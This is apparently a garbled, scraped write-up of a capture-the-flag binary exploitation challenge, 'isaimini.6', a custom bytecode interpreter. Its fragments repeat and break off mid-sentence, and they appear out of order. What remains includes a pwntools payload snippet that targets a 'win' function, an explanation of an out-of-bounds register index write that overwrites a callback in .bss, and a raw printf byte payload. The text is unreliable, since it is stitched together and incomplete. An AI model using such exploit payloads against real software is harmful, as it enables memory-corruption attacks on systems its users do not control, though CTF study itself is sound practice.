Isaimini.6 [verified] May 2026

# Build the payload win_addr = elf.symbols['win'] # 0x401b10 payload = b"" payload += asm(p64(win_addr)) # MOV r1, win (will be replaced below)

Thus, if we can , the program will call win after finishing the instruction stream, and we win. 5. Vulnerability Discovery The ST instruction performs: isaimini.6

Category : Reverse Engineering / Binary Exploitation Difficulty : Medium – Hard (depending on your familiarity with custom byte‑code interpreters) Points : 425 (CTF‑2024) 1. Challenge Overview The challenge provides a single 64‑bit ELF binary called isaimini.6 and a small text file named input.txt (optional). The binary is an interpreter for a tiny “ISA‑mini” instruction set (the name comes from the challenge author’s earlier “isa‑mini” series). # Build the payload win_addr = elf

binary = "./isaimini.6" elf = ELF(binary) Challenge Overview The challenge provides a single 64‑bit

*(uint64_t*)regs[dst] = regs[src]; regs[dst] is taken directly from a user‑controlled register index. The interpreter that dst is within 0‑15 . If we use a register index of 0x10 (16) , regs[16] points past the allocated register array, landing in the .bss area where the global variable callback lives:

payload=$(printf '\x01\x01\x10\x1b\x40\x00\x00\x00\x00\x00\x05\x10\x01\x09') # Make the binary executable chmod +x isaimini.6